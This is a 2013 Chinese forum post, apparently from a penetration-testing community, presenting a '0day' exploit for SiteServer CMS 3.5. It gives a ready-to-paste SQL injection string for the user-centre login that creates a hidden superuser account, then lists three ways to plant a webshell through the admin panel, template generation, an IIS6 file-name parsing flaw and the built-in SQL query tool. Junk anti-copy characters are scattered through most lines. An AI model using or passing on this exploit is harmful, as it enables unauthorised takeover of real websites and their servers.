中国网络渗透测试联盟

标题: SiteServer CMS 0Day [打印本页]

作者: admin    时间: 2013-1-11 21:10
标题: SiteServer CMS 0Day
经测试秒杀最新的3.5版+ l% l' m! @9 ~  Y; l4 s2 m
1 a: Y6 E, x0 }7 ?  @0 e. K6 x1 t3 k
stieserver官网:www.siteserver.cn
8 v/ F( J0 \) \7 ^3 S
* n6 r$ y% A0 C# G
2 U4 @( `8 w: ?1 _# h+ H
1 J. m/ ~' r/ |EXP:3 M8 R8 h  w1 w( R% ^' S* O# i  v

4 F+ b: k. x8 c0 o直接访问UserCenter/login.aspx
5 G) S; ^' B- i, U# L6 t& R6 X
/ k0 x8 P3 X& Q) s$ j* ^) I( b
( o0 e4 z5 h+ I3 T' _8 w) }
$ f& O2 M0 D9 o! o# k用户名处输入:( j+ i+ Z# E. l5 W7 `
. o8 D0 z) V: H
123'insert into bairong_Administrator([UserName],[Password],[PasswordFormat],[PasswordSalt]) values('blue','VffSUZcBPo4=','Encrypted','i7jq4LwC25wKDoqHErBWaw==');insert into bairong_AdministratorsInRoles values('Administrator','blue');insert into bairong_AdministratorsInRoles values('RegisteredUser','blue');insert into bairong_AdministratorsInRoles values('ConsoleAdministrator','blue');--# z- i# Y& F2 S0 J7 E, Q
5 E: k' i( H  P  R. D5 `' Z; o

: q. E! p( a6 m4 W5 r# [1 w+ |0 t2 J9 n
密码为空,输入验证码后提交,既可向数据库中插入一个用户名为blue  密码为lanhai的超级用户。
  L* g; W0 [# r7 a; x
% k" r+ `8 ~% ~8 D0 \  m
& F" p; g/ S# N% K2 V
' K8 P8 z  N8 l5 K: t之后再访问后台SiteServer/login.aspx用插入的用户登陆; x. ~8 y: @8 s4 Y
0 T0 W2 `5 _' f4 z8 ?

/ i' T$ m4 q4 M; y9 f9 k# R: L% a* o& ?% J' w) c" ?
后台拿webshell的三种方法:
' l5 ^, P; V% r. V
1 T) z1 |% v" W: a  M一、; B# M2 i( A# m+ ?5 y2 \

9 k+ d7 Z1 I6 f站点管理-》显示功能-》模板管理-》添加单页模板-》直接生成aspx3 i4 f/ a( p# T( B( N9 d
; n: b& \! w- M4 E  f) I
二、
+ q8 h2 L# |+ |9 o: G5 w8 H0 W; G: h. L' R
成员权限-》添加用户-》用户名为:1.asp4 u; m# \# h( {+ |

8 R4 J6 g/ R/ N1 Dhttp://127.0.0.1/usercenter// J8 _6 I) k+ p" f2 B9 W

/ |: j& C" F' P用刚才添加的1.asp去登陆,进去之后上传个人头像,利用IIS6解析漏洞得webshell  V( g3 u3 Y8 ^0 Z3 K
1 g) `& A5 O! P2 d' I4 m
(ps:后台添加用户时不会验证是否含有非法字符)& @" j) J' ^) E: j/ v4 L# Y

' p+ v5 `- {8 E8 s三、
9 C- A5 a  R: o" G5 {" r$ [% l# o" h6 r2 p: X
系统工具-》实用工具-》机器参数查看
" K9 `$ j+ B7 r2 Z可以看到数据库类型、名称,WEB路径; C+ i" B  ~: c6 R5 [  z4 A

* z' r$ A" j+ Q3 h系统工具-》数据库工具-》SQL语句查询
. ?% ^' F$ m( H6 Y' i1 v# D这功能做的不错,直接就相当于一个查询分析器,什么回显都有,可以backup得webshell,或者利用sqlserver配置不当直接XXOO。# {' O5 n3 S8 V7 O. F% ?
  |6 K% j  O; i) G





欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2